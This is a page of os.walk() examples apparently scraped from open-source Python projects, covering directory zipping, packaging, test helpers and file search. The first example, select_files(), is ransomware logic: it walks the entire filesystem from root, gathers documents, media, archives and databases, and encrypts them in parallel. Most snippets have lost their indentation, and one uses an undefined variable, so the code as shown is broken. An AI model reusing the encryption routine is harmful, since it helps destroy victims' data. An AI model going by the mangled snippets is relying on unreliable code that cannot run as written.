Python os module: walk() example source code
The following code examples, extracted from open-source Python projects, illustrate how to use os.walk().
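As a primer: os.walk(top) yields one (dirpath, dirnames, filenames) tuple per directory under top, and every example below builds on that pattern. A minimal sketch, using a hypothetical target directory:

import os

for dirpath, dirnames, filenames in os.walk("/tmp/example"):
    # dirpath is the directory currently being visited; dirnames and
    # filenames list its immediate subdirectories and files.
    for name in filenames:
        print(os.path.join(dirpath, name))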
def select_files():
ext = [".3g2", ".3gp", ".asf", ".asx", ".avi", ".flv",
".m2ts", ".mkv", ".mov", ".mp4", ".mpg", ".mpeg",
".rm", ".swf", ".vob", ".wmv" ".docx", ".pdf",".rar",
".jpg", ".jpeg", ".png", ".tiff", ".zip", ".7z", ".exe",
".tar.gz", ".tar", ".mp3", ".sh", ".c", ".cpp", ".h",
".gif", ".txt", ".py", ".pyc", ".jar", ".sql", ".bundle",
".sqlite3", ".html", ".PHP", ".log", ".bak", ".deb"]
files_to_enc = []
for root, dirs, files in os.walk("/"):
for file in files:
if file.endswith(tuple(ext)):
files_to_enc.append(os.path.join(root, file))
# Parallelize execution of encryption function over four subprocesses
pool = Pool(processes=4)
pool.map(single_arg_encrypt_file, files_to_enc)
def zipdir(archivename, basedir):
    '''Zip directory, from J.F. Sebastian http://stackoverflow.com/'''
assert os.path.isdir(basedir)
with closing(ZipFile(archivename, "w", ZIP_DEFLATED)) as z:
        for root, dirs, files in os.walk(basedir):
#NOTE: ignore empty directories
for fn in files:
                if fn[-4:] != '.zip':
absfn = os.path.join(root, fn)
zfn = absfn[len(basedir)+len(os.sep):] #XXX: relative path
z.write(absfn, zfn)
# ================ Inventory input data and create data structure =================
def zip_dir(directory):
"""zip a directory tree into a BytesIO object"""
result = io.BytesIO()
dlen = len(directory)
with ZipFile(result, "w") as zf:
        for root, dirs, files in os.walk(directory):
for name in files:
full = os.path.join(root, name)
rel = root[dlen:]
dest = os.path.join(rel, name)
zf.write(full, dest)
return result
#
# Simple progress bar
#
def load_data(self):
    # work in the parent of the pages directory, because we
# want the filenames to begin "pages/...".
chdir(dirname(self.setup.pages_dir))
rel = relpath(self.setup.pages_dir)
    for root, dirs, files in walk(rel):
for filename in files:
start, ext = splitext(filename)
if ext in self.setup.data_extensions:
#yield root,dirs,filename
loader = self.setup.data_loaders.get(ext)
                path = join(root, filename)
if not loader:
raise SetupError("Identified data file '%s' by type '%s' but no loader found" % (filename, ext))
data_key = join(root, start)
loaded_dict = loader.loadf(path)
self.data[data_key] = loaded_dict
#self.setup.log.debug("data key [%s] ->" % (data_key,),root,filename,); pprint.pprint(loaded_dict,sys.stdout)
#pprint.pprint(self.data,sys.stdout)
#print("XXXXX data:",self.data)
def prepare_zip():
from pkg_resources import resource_filename as resource
from config import config
from json import dumps
logger.info('creating/updating gimel.zip')
with ZipFile('gimel.zip', 'w', ZIP_DEFLATED) as zipf:
info = ZipInfo('config.json')
info.external_attr = 0o664 << 16
zipf.writestr(info, dumps(config))
zipf.write(resource('gimel', 'config.py'), 'config.py')
zipf.write(resource('gimel', 'gimel.py'), 'gimel.py')
zipf.write(resource('gimel', 'logger.py'), 'logger.py')
        for root, dirs, files in os.walk(resource('gimel', 'vendor')):
for file in files:
real_file = os.path.join(root, file)
relative_file = os.path.relpath(real_file,
resource('gimel', ''))
zipf.write(real_file, relative_file)
def zipdir(path, zipn):
    for root, dirs, files in os.walk(path):
for file in files:
zipn.write(os.path.join(root, file))
def gen_data_files(src_dir):
"""
generates a list of files contained in the given directory (and its
subdirectories) in the format required by the ``package_data`` parameter
of the ``setuptools.setup`` function.
Parameters
----------
src_dir : str
(relative) path to the directory structure containing the files to
be included in the package distribution
Returns
-------
fpaths : list(str)
a list of file paths
"""
fpaths = []
base = os.path.dirname(src_dir)
    for root, dirs, files in os.walk(src_dir):
if len(files) != 0:
for f in files:
fpaths.append(os.path.relpath(os.path.join(root, f), base))
return fpaths
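For context, the paths returned above are meant for the package_data argument of setuptools.setup. A minimal usage sketch, assuming a hypothetical package mypkg with its data files under mypkg/data:

from setuptools import setup

setup(
    name="mypkg",  # hypothetical package name
    packages=["mypkg"],
    # gen_data_files returns paths relative to the package directory,
    # e.g. "data/sample.txt", which is what package_data expects.
    package_data={"mypkg": gen_data_files("mypkg/data")},
)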
def clearpyc(root, patterns='*', single_level=False, yield_folders=False):
    """
    root: the directory to start walking from
    patterns: semicolon-separated glob patterns to match against
    single_level: if True, search only the top level of root
    yield_folders: if True, match and yield folder names as well
    """
patterns = patterns.split(';')
for path, subdirs, files in os.walk(root):
if yield_folders:
files.extend(subdirs)
files.sort()
for name in files:
for pattern in patterns:
                if fnmatch.fnmatch(name, pattern.strip()):  # does name match this pattern?
yield os.path.join(path, name)
if single_level:
break
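Since clearpyc only yields matching paths, the caller decides what to do with them. A hypothetical usage sketch that sweeps up compiled bytecode:

for path in clearpyc(".", patterns="*.pyc;*.pyo"):
    print("removing", path)
    os.remove(path)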
def get_distribution_names(self):
"""
    Return all the distribution names known to this locator.
"""
result = set()
    for root, dirs, files in os.walk(self.base_dir):
for fn in files:
if self.should_include(fn, root):
fn = os.path.join(root, fn)
                url = urlunparse(('file', '',
                                  pathname2url(os.path.abspath(fn)),
                                  '', '', ''))
info = self.convert_url_to_download_info(url, None)
if info:
result.add(info['name'])
if not self.recursive:
break
return result
def test_pydist():
"""Make sure pydist.json exists and validates against our schema."""
# XXX this test may need manual cleanup of older wheels
import jsonschema
def open_json(filename):
return json.loads(open(filename, 'rb').read().decode('utf-8'))
    pymeta_schema = open_json(resource_filename('wheel.test',
                                                'pydist-schema.json'))
valid = 0
for dist in ("simple.dist", "complex-dist"):
basedir = pkg_resources.resource_filename('wheel.test', dist)
        for (dirname, subdirs, filenames) in os.walk(basedir):
for filename in filenames:
if filename.endswith('.whl'):
whl = ZipFile(os.path.join(dirname, filename))
for entry in whl.infolist():
                        if entry.filename.endswith('/metadata.json'):
                            pymeta = json.loads(whl.read(entry).decode('utf-8'))
                            jsonschema.validate(pymeta, pymeta_schema)
valid += 1
    assert valid > 0, "No metadata.json found"
def get_all_pages(self):
    # work in the parent of the pages directory, because we
# want the filenames to begin "pages/...".
chdir(dirname(self.setup.pages_dir))
rel = relpath(self.setup.pages_dir)
    for root, dirs, files in walk(rel):  # self.config.pages_dir):
# examples:
#
# root='pages' root='pages/categories'
# dirs=['categories'] dirs=[]
# files=['index.html'] files=['list.html']
# self.setup.log.debug("\nTEMPLATE ROOT: %s" % root)
# self.setup.log.debug("TEMPLATE Dirs: %s" % dirs)
# self.setup.log.debug("TEMPLATE FILENAMES: %s" % files)
# #dir_context = global_context.new_child(data_tree[root])
for filename in files:
start, ext = splitext(filename)
if ext in self.setup.template_extensions:
# if filename.endswith(".html"): # Todo: should this filter be required at all?
yield Page(self.setup, filename, join(root, filename))
def unpack_directory(filename, extract_dir, progress_filter=default_filter):
""""Unpack" a directory,using the same interface as for archives
Raises ``UnrecognizedFormat`` if `filename` is not a directory
"""
if not os.path.isdir(filename):
raise UnrecognizedFormat("%s is not a directory" % filename)
paths = {
filename: ('', extract_dir),
}
    for base, dirs, files in os.walk(filename):
src, dst = paths[base]
for d in dirs:
paths[os.path.join(base, d)] = src + d + '/', os.path.join(dst, d)
for f in files:
target = os.path.join(dst, f)
target = progress_filter(src + f, target)
if not target:
# skip non-files
continue
ensure_directory(target)
f = os.path.join(base, f)
shutil.copyfile(f, target)
shutil.copystat(f, target)
def find_problems(problem_path):
"""
Find all problems that exist under the given root.
We consider any directory with a problem.json to be an intended problem directory.
Args:
problem_path: the problem directory
Returns:
A list of problem paths returned from get_problem.
"""
problem_paths = []
for root, _, files in os.walk(problem_path):
if "problem.json" in files and "__staging" not in root:
problem_paths.append(root)
return problem_paths
def files_from_directory(directory, recurse=True, permissions=0o664):
"""
Returns a list of File objects for every file in a directory. Can recurse optionally.
Args:
directory: The directory to add files from
recurse: Whether or not to recursively add files. Defaults to true
permissions: The default permissions for the files. Defaults to 0o664.
"""
result = []
for root, dirnames, filenames in os.walk(directory):
for filename in filenames:
result.append(File(join(root, filename), permissions))
if not recurse:
break
return result
def get_unignored_file_paths(cls, ignore_list=None, white_list=None):
config = cls.get_config()
ignore_list = ignore_list or config[0]
white_list = white_list or config[1]
unignored_files = []
for root, files in os.walk("."):
logger.debug("Root:%s,Dirs:%s", root, dirs)
if cls._ignore_path(unix_style_path(root), ignore_list, white_list):
dirs[:] = []
logger.debug("Ignoring directory : %s", root)
continue
for file_name in files:
file_path = unix_style_path(os.path.join(root, file_name))
            if cls._ignore_path(file_path, ignore_list, white_list):
logger.debug("Ignoring file : %s", file_name)
continue
unignored_files.append(os.path.join(root, file_name))
return unignored_files
def __processDir(self):
"""
Looks for Makefiles in the given directory and all the sub-directories
if recursive is set to true
"""
self.__log("Processing directory %s" % self.__tgt)
    # if recursing, use os.walk; otherwise check the current directory only
if self.__recurse:
        for (path, dirs, files) in os.walk(self.__tgt):
for curr_file in files:
                # if the file is a Makefile, add it to the list for processing
if curr_file == __PATTERN__:
fname = os.path.join(path, curr_file)
self.__make_files.append(fname)
self.__log("Adding %s to list" % fname)
else:
# just care to find Makefiles in this directory
files = os.listdir(self.__tgt)
if __PATTERN__ in files:
fname = os.path.join(self.__tgt, __PATTERN__)
self.__log("Appending %s to the list" % fname)
self.__make_files.append(fname)
def get_sqls(self):
"""This function extracts sqls from the java files with mybatis sqls.
Returns:
A list of :class:`sql`. For example:
[sql('',u'select a.id,b.name from db.ac a join db.bc b on a.id=b.id or a.id=b.iid where a.cnt > 10')]
"""
sqls = []
    for root, dirs, files in os.walk(self.dir):
for file in files:
if not file.endswith('.java'):
continue
with codecs.open(os.path.join(root, file), 'r', encoding=self.encoding) as f:
sqls.extend(MybatisInlinesqlExtractor.get_selects_from_text(MybatisInlinesqlExtractor.remove_comment(f.read())))
return sqls
def refactor_dir(self, dir_name, write=False, doctests_only=False):
"""Descends down a directory and refactor every Python file found.
Python files are assumed to have a .py extension.
Files and subdirectories starting with '.' are skipped.
"""
py_ext = os.extsep + "py"
    for dirpath, dirnames, filenames in os.walk(dir_name):
self.log_debug("Descending into %s", dirpath)
dirnames.sort()
filenames.sort()
for name in filenames:
if (not name.startswith(".") and
os.path.splitext(name)[1] == py_ext):
fullname = os.path.join(dirpath, name)
self.refactor_file(fullname, write, doctests_only)
# Modify dirnames in-place to remove subdirs with leading dots
dirnames[:] = [dn for dn in dirnames if not dn.startswith(".")]
def remove_folder(self, folder):
"""Delete the named folder,which must be empty."""
path = os.path.join(self._path, '.' + folder)
for entry in os.listdir(os.path.join(path, 'new')) + \
os.listdir(os.path.join(path, 'cur')):
if len(entry) < 1 or entry[0] != '.':
raise NotEmptyError('Folder contains message(s): %s' % folder)
for entry in os.listdir(path):
if entry != 'new' and entry != 'cur' and entry != 'tmp' and \
os.path.isdir(os.path.join(path, entry)):
raise NotEmptyError("Folder contains subdirectory '%s': %s" %
(folder, entry))
    for root, dirs, files in os.walk(path, topdown=False):
for entry in files:
os.remove(os.path.join(root, entry))
for entry in dirs:
os.rmdir(os.path.join(root, entry))
os.rmdir(path)
def find_media_files(media_path):
unconverted = []
for dirname, directories, files in os.walk(media_path):
for file in files:
#skip hidden files
if file.startswith('.'):
continue
if is_video(file) or is_subtitle(file):
file = os.path.join(dirname, file)
#Skip Sample files
if re.search(".sample.",file,re.I):
continue
unconverted.append(file)
    sorted_unconverted = sorted(unconverted)
    return sorted_unconverted
def get_latest_data_subdir(pattern=None, take=-1):
def get_date(f):
return os.stat(os.path.join(BASE_data_dir, f)).st_mtime
try:
dirs = next(os.walk(BASE_data_dir))[1]
    except StopIteration:
return None
if pattern is not None:
dirs = (d for d in dirs if pattern in d)
dirs = list(sorted(dirs, key=get_date))
if len(dirs) == 0:
return None
return dirs[take]
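Note the next(os.walk(BASE_data_dir))[1] idiom above: it consumes only the first tuple the generator yields, i.e. the immediate subdirectories of BASE_data_dir, without walking any deeper. A minimal sketch with a hypothetical directory:

import os

# next() raises StopIteration if the directory does not exist,
# hence the try/except in get_latest_data_subdir above.
root, subdirs, files = next(os.walk("/tmp/example"))
print(subdirs)  # top-level subdirectories only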
def garbage_collection():
global garbage_count, garbage_list
garbage_count = 0
garbage_list = ''
    for root, dirs, targets in os.walk(media_path):
for target_name in targets:
if target_name.endswith(garbage):
garbage_count += 1
fullpath = os.path.normpath(os.path.join(str(root), str(target_name)))
garbage_list = garbage_list + "\n" + (str(garbage_count) + ': ' + fullpath)
os.remove(fullpath)
if garbage_count == 0:
print ("\nGarbage Collection: There was no garbage found!")
elif garbage_count == 1:
print ("\nGarbage Collection: The following file was deleted:")
else:
print ("\nGarbage Collection: The following " + str(garbage_count) + " files were deleted:")
    print(garbage_list)
# Log various session statistics
def list_image(root, recursive, exts):
i = 0
if recursive:
cat = {}
        for path, dirs, files in os.walk(root, followlinks=True):
dirs.sort()
files.sort()
for fname in files:
fpath = os.path.join(path, fname)
suffix = os.path.splitext(fname)[1].lower()
if os.path.isfile(fpath) and (suffix in exts):
if path not in cat:
cat[path] = len(cat)
yield (i, os.path.relpath(fpath, root), cat[path])
i += 1
for k, v in sorted(cat.items(), key=lambda x: x[1]):
            print(os.path.relpath(k, root), v)
else:
for fname in sorted(os.listdir(root)):
fpath = os.path.join(root, fname)
suffix = os.path.splitext(fname)[1].lower()
if os.path.isfile(fpath) and (suffix in exts):
                yield (i, os.path.relpath(fpath, root), 0)
i += 1
def reseed(self, netdb):
"""Compress netdb entries and set content"""
zip_file = io.BytesIO()
dat_files = []
    for root, dirs, files in os.walk(netdb):
for f in files:
if f.endswith(".dat"):
# Todo check modified time
# may be not older than 10h
dat_files.append(os.path.join(root, f))
if len(dat_files) == 0:
raise PyseederException("Can't get enough netDb entries")
elif len(dat_files) > 75:
dat_files = random.sample(dat_files, 75)
    with ZipFile(zip_file, "w", compression=ZIP_DEFLATED) as zf:
for f in dat_files:
zf.write(f, arcname=os.path.split(f)[1])
self.FILE_TYPE = 0x00
self.CONTENT_TYPE = 0x03
self.CONTENT = zip_file.getvalue()
self.CONTENT_LENGTH = len(self.CONTENT)
def QA_save_tdx_to_mongo(file_dir, client=QA_Setting.client):
reader = TdxMinBarReader()
__coll = client.quantaxis.stock_min_five
for a, v, files in os.walk(file_dir):
for file in files:
if (str(file)[0:2] == 'sh' and int(str(file)[2]) == 6) or \
(str(file)[0:2] == 'sz' and int(str(file)[2]) == 0) or \
(str(file)[0:2] == 'sz' and int(str(file)[2]) == 3):
                QA_util_log_info('Now_saving ' + str(file)[2:8] + '\'s 5 min tick')
fname = file_dir + '\\' + file
df = reader.get_df(fname)
df['code'] = str(file)[2:8]
df['market'] = str(file)[0:2]
df['datetime'] = [str(x) for x in list(df.index)]
df['date'] = [str(x)[0:10] for x in list(df.index)]
df['time_stamp'] = df['datetime'].apply(
lambda x: QA_util_time_stamp(x))
df['date_stamp'] = df['date'].apply(
lambda x: QA_util_date_stamp(x))
data_json = json.loads(df.to_json(orient='records'))
__coll.insert_many(data_json)
def create_zipfile(self, filename):
zip_file = zipfile.ZipFile(filename, "w")
try:
self.mkpath(self.target_dir) # just in case
        for root, dirs, files in os.walk(self.target_dir):
if root == self.target_dir and not files:
                raise DistutilsOptionError(
"no files found in upload directory '%s'"
% self.target_dir)
for name in files:
full = os.path.join(root, name)
relative = root[len(self.target_dir):].lstrip(os.path.sep)
dest = os.path.join(relative, name)
zip_file.write(full, dest)
finally:
zip_file.close()
def ensure_init(path):
    '''
    ensure directories leading up to path are importable, omitting
    parent directory, eg path='/hooks/helpers/foo'/:
        hooks/
        hooks/helpers/__init__.py
        hooks/helpers/foo/__init__.py
    '''
    for d, dirs, files in os.walk(os.path.join(*path.split('/')[:2])):
_i = os.path.join(d, '__init__.py')
if not os.path.exists(_i):
logging.info('Adding missing __init__.py: %s' % _i)
open(_i, 'wb').close()
def chownr(path, owner, group, follow_links=True, chowntopdir=False):
"""Recursively change user and group ownership of files and directories
    in given path. Doesn't chown path itself by default, only its children.
:param str path: The string path to start changing ownership.
:param str owner: The owner string to use when looking up the uid.
:param str group: The group string to use when looking up the gid.
    :param bool follow_links: Also chown links if True
:param bool chowntopdir: Also chown path itself if True
"""
uid = pwd.getpwnam(owner).pw_uid
gid = grp.getgrnam(group).gr_gid
if follow_links:
chown = os.chown
else:
chown = os.lchown
if chowntopdir:
broken_symlink = os.path.lexists(path) and not os.path.exists(path)
if not broken_symlink:
chown(path, uid, gid)
    for root, dirs, files in os.walk(path):
for name in dirs + files:
full = os.path.join(root, name)
broken_symlink = os.path.lexists(full) and not os.path.exists(full)
if not broken_symlink:
                chown(full, uid, gid)
def get_dir_size(start_path='.'):
total_size = 0
    for dirpath, dirnames, filenames in os.walk(start_path):
for f in filenames:
fp = os.path.join(dirpath, f)
total_size += os.path.getsize(fp)
return total_size
def get_apk_file_in_path(path):
apk_map = []
for parent, dir_names, filenames in os.walk(path):
for f in filenames:
if f.endswith(Res.pgk_suffix):
apk_map.append(os.path.join(parent, f))
return apk_map
def list_images(dir):
r = []
    for root, dirs, files in os.walk(dir):
for name in files:
if "jpg" in name or "mp4" in name:
r.append(os.path.join(root, name))
return r
# Load game IDs file
def package_files(directory):
"""Recursively add subfolders and files."""
paths = []
    for (path, directories, filenames) in os.walk(directory):
for filename in filenames:
paths.append(os.path.join('..', path, filename))
return paths
def maybe_load_scriptlets(cfg):
    global scriptlets
    if scriptlets is not None:
        return
    scriptlets = OrderedDict()
scriptlet_dir = os.path.join(cfg['assets'], 'scriptlets')
    for root, dirs, files in os.walk(scriptlet_dir):
for filename in files:
contents = open(os.path.join(root, filename)).read()
            m = re.search(r'_(.*)\.py', filename)
if m:
filename = m.group(1)
scriptlets[filename] = contents
def maybe_load_policies(cfg, policies_dict):
# Update policies_dict with files found in /src/assets/policies
policy_dir = os.path.join(cfg['assets'], 'policies')
    for root, dirs, files in os.walk(policy_dir):
for filename in files:
contents = open(os.path.join(root, filename)).read()
policies_dict[filename] = contents
return policies_dict
def __init__(self, cfg):
static_dir = os.path.join(cfg['assets'], 'static')
self.files = {}
    for root, dirs, files in os.walk(static_dir):
for filename in files:
if not filename.startswith('!'):
fullpath = os.path.join(root, filename)
self.files[filename] = File(fullpath)
def _get_project(self, name):
    result = {'urls': {}, 'digests': {}}
    for root, dirs, files in os.walk(self.base_dir):
        for fn in files:
            if self.should_include(fn, root):
                fn = os.path.join(root, fn)
                url = urlunparse(('file', '',
                                  pathname2url(os.path.abspath(fn)),
                                  '', '', ''))
                info = self.convert_url_to_download_info(url, name)
                if info:
                    self._update_version_data(result, info)
        if not self.recursive:
            break
    return result
def _iglob(path_glob):
rich_path_glob = RICH_GLOB.split(path_glob, 1)
if len(rich_path_glob) > 1:
assert len(rich_path_glob) == 3, rich_path_glob
prefix, set, suffix = rich_path_glob
for item in set.split(','):
for path in _iglob(''.join((prefix, item, suffix))):
yield path
else:
if '**' not in path_glob:
for item in std_iglob(path_glob):
yield item
else:
prefix, radical = path_glob.split('**', 1)
if prefix == '':
prefix = '.'
if radical == '':
radical = '*'
else:
# we support both
radical = radical.lstrip('/')
radical = radical.lstrip('\\')
            for path, dirs, files in os.walk(prefix):
path = os.path.normpath(path)
for fn in _iglob(os.path.join(path, radical)):
yield fn
def write_record(self, bdist_dir, distinfo_dir):
from wheel.util import urlsafe_b64encode
record_path = os.path.join(distinfo_dir, 'RECORD')
record_relpath = os.path.relpath(record_path, bdist_dir)
def walk():
        for dir, dirs, files in os.walk(bdist_dir):
dirs.sort()
for f in sorted(files):
yield os.path.join(dir, f)
def skip(path):
"""Wheel hashes every possible file."""
return (path == record_relpath)
with open_for_csv(record_path, 'w+') as record_file:
writer = csv.writer(record_file)
for path in walk():
relpath = os.path.relpath(path, bdist_dir)
if skip(relpath):
hash = ''
size = ''
else:
with open(path, 'rb') as f:
data = f.read()
digest = hashlib.sha256(data).digest()
hash = 'sha256=' + native(urlsafe_b64encode(digest))
size = len(data)
record_path = os.path.relpath(
path, bdist_dir).replace(os.path.sep, '/')
writer.writerow((record_path, hash, size))
def test_no_scripts():
"""Make sure entry point scripts are not generated."""
dist = "complex-dist"
basedir = pkg_resources.resource_filename('wheel.test', dist)
    for (dirname, subdirs, filenames) in os.walk(basedir):
for filename in filenames:
if filename.endswith('.whl'):
whl = ZipFile(os.path.join(dirname, filename))
for entry in whl.infolist():
                    assert '.data/scripts/' not in entry.filename
def get_ext_outputs(self):
"""Get a list of relative paths to C extensions in the output distro"""
all_outputs = []
ext_outputs = []
paths = {self.bdist_dir: ''}
    for base, dirs, files in os.walk(self.bdist_dir):
for filename in files:
if os.path.splitext(filename)[1].lower() in NATIVE_EXTENSIONS:
all_outputs.append(paths[base] + filename)
for filename in dirs:
paths[os.path.join(base, filename)] = (paths[base] +
filename + '/')
if self.distribution.has_ext_modules():
build_cmd = self.get_finalized_command('build_ext')
for ext in build_cmd.extensions:
if isinstance(ext, Library):
continue
fullname = build_cmd.get_ext_fullname(ext.name)
filename = build_cmd.get_ext_filename(fullname)
if not os.path.basename(filename).startswith('dl-'):
if os.path.exists(os.path.join(self.bdist_dir, filename)):
ext_outputs.append(filename)
return all_outputs, ext_outputs
def make_zipfile(zip_filename, base_dir, verbose=0, dry_run=0, compress=True,
mode='w'):
"""Create a zip file from all the files under 'base_dir'. The output
zip file will be named 'base_dir' + ".zip". Uses either the "zipfile"
Python module (if available) or the InfoZIP "zip" utility (if installed
and found on the default search path). If neither tool is available,
    raises DistutilsExecError. Returns the name of the output zip file.
"""
import zipfile
mkpath(os.path.dirname(zip_filename), dry_run=dry_run)
log.info("creating '%s' and adding '%s' to it", zip_filename, base_dir)
def visit(z, dirname, names):
for name in names:
path = os.path.normpath(os.path.join(dirname, name))
if os.path.isfile(path):
p = path[len(base_dir) + 1:]
if not dry_run:
z.write(path, p)
log.debug("adding '%s'", p)
compression = zipfile.ZIP_DEFLATED if compress else zipfile.ZIP_STORED
if not dry_run:
z = zipfile.ZipFile(zip_filename, mode, compression=compression)
        for dirname, dirs, files in os.walk(base_dir):
            visit(z, dirname, files)
z.close()
else:
        for dirname, dirs, files in os.walk(base_dir):
            visit(None, dirname, files)
return zip_filename
def add_output(self, path):
if os.path.isdir(path):
        for base, dirs, files in os.walk(path):
for filename in files:
self.outputs.append(os.path.join(base, filename))
else:
self.outputs.append(path)
def _find_packages_iter(cls, where, exclude, include):
"""
    All the packages found in 'where' that pass the 'include' filter, but
not the 'exclude' filter.
"""
    for root, dirs, files in os.walk(where, followlinks=True):
        # copy dirs to iterate over it, then empty dirs.
all_dirs = dirs[:]
dirs[:] = []
for dir in all_dirs:
full_path = os.path.join(root, dir)
rel_path = os.path.relpath(full_path, where)
package = rel_path.replace(os.path.sep, '.')
# Skip directory trees that are not valid packages
if ('.' in dir or not cls._looks_like_package(full_path)):
continue
# Should this package be included?
if include(package) and not exclude(package):
yield package
            # Keep searching subdirectories, as there may be more packages
            # down there, even if the parent was excluded.
dirs.append(dir)
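The dirs[:] = [] assignment in _find_packages_iter is the standard way to prune os.walk in place: mutating the list through a slice changes what walk will descend into, whereas rebinding dirs would not. A standalone sketch of the same idiom, with a hypothetical source tree:

import os

for root, dirs, files in os.walk("src"):
    # Mutate dirs in place so os.walk never descends into hidden directories.
    dirs[:] = [d for d in dirs if not d.startswith(".")]
    for name in files:
        print(os.path.join(root, name))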